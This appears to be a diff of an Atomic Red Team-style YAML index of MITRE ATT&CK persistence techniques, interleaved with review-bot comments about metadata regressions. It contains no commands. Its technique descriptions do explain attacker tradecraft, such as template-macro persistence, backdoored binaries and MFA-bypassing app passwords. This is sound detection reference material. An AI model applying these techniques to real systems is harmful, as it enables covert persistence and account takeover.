- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
@@ -54052,6 +54414,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -54061,9 +54424,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -54071,11 +54438,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests:
- name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
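Review bot: the one substantive data change in this hunk is the removal of `x_mitre_permissions_required` (`User`, `Administrator`) for T1137.001 at the top of the hunk, which has no replacement; everything else here (external_references, id, created, created_by_ref, object_marking_refs) was removed earlier in this entry and is re-added in a different key order, plus `revoked: false` and the 3.2.0 spec version. A reorder diff this large hides that dropped field, so please call it out explicitly and confirm nothing downstream derives permission or elevation information from it.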
@@ -54203,7 +54606,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -54251,8 +54654,6 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests:
- name: Create registry persistence via AppCert DLL
@@ -54297,7 +54698,7 @@ persistence:
elevation_required: true
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -54310,16 +54711,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -54331,16 +54732,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -54395,7 +54796,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -54456,7 +54856,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -54532,7 +54931,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -54560,8 +54959,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests:
- name: Persistence by modifying Windows Terminal profile
@@ -54632,7 +55029,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -54657,23 +55054,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -54683,11 +55078,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -54698,12 +55097,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -54712,6 +55118,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -54720,13 +55127,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
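Review bot: the two `Active Directory: Active Directory Object Creation` and `Active Directory: Active Directory Object Modification` data sources added under `x_mitre_data_sources` for T1098.001 are the only detection-side additions accompanying the new CreateLoginProfile and app-password description text earlier in this entry; the visible `x_mitre_detection` lines remain unchanged context naming only Azure Activity Logs and SSH-key APIs. If this index feeds detection coverage mapping, note that login-profile and app-password changes are now described but not yet reflected in the detection text.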
@@ -54752,10 +55162,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -54764,10 +55182,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -54784,14 +55212,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -54866,7 +55291,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -54955,7 +55379,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -55093,19 +55516,23 @@ persistence:
name: powershell
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
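Review bot: the replacement description line (`+ Adversaries may establish persistence though modifications to host software binaries.`) carries the "though" for "through" typo into the new text unchanged; since this index appears to be generated from the ATT&CK STIX bundle rather than hand-edited, that wording should be fixed upstream instead of patched here. The new paragraph's `(Citation: Google Cloud Mandiant UNC3886 2024)` tag must match the `source_name` added to `external_references` further down exactly, including case and spacing, or the citation will not resolve when rendered.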
@@ -55119,7 +55546,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -55134,6 +55561,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
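Review bot: the new `Google Cloud Mandiant UNC3886 2024` entry's `description` string begins with a stray leading space (`description: " Punsaen Boonyakarn, ...`), unlike the neighbouring entries; it is harmless to the YAML parser but will show up in anything that renders the citation text, so trim it (upstream, if this file is generated).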
@@ -55147,11 +55579,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
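Review bot: `spec_version: '2.1'` is deleted here, and the same deletion is repeated for every object touched in this diff, while `x_mitre_attack_spec_version` is kept; if any consumer of the index reads the STIX `spec_version` key it will now come back missing, so confirm nothing downstream depends on it before merging.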
@@ -55177,7 +55608,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -55191,7 +55621,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -55218,8 +55647,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -55230,7 +55659,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests:
- name: Change Default File Association
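Review bot: the two keys added here, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref: identity--c78cb6e5-...`, are the same keys deleted from the top of the T1546.001 object in the two hunks above (where the spec version read `2.1.0`), so the substantive change is a spec-version bump plus a key reorder. The reorder makes the diff much noisier than the change warrants; having the generator emit keys in a stable order would keep such updates reviewable at a glance.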
@@ -55300,7 +55730,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
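Review bot: the `modified` timestamp for T1546.014 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T00:16:01.732Z`, and the same regression appears for T1574.010, KernelCallbackTable and ROMMONkit later in this diff. The old values all share the `14:00:00.188Z` time of day, which looks like a synthetic batch timestamp, so the new values are plausibly the real upstream ones, but confirm the index was regenerated from the current bundle rather than an older one.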
@@ -55320,12 +55750,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
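Review bot: `x_mitre_attack_spec_version: 2.1.0` in the context at the top of this hunk is left unchanged for T1546.014 even though `spec_version` is removed from the same object and the other objects in this diff are bumped to `3.2.0`; check whether the generator intentionally leaves this object at 2.1.0 or whether its upstream source simply was not refreshed.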
@@ -55379,11 +55808,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -55470,9 +55898,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -55485,7 +55913,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests:
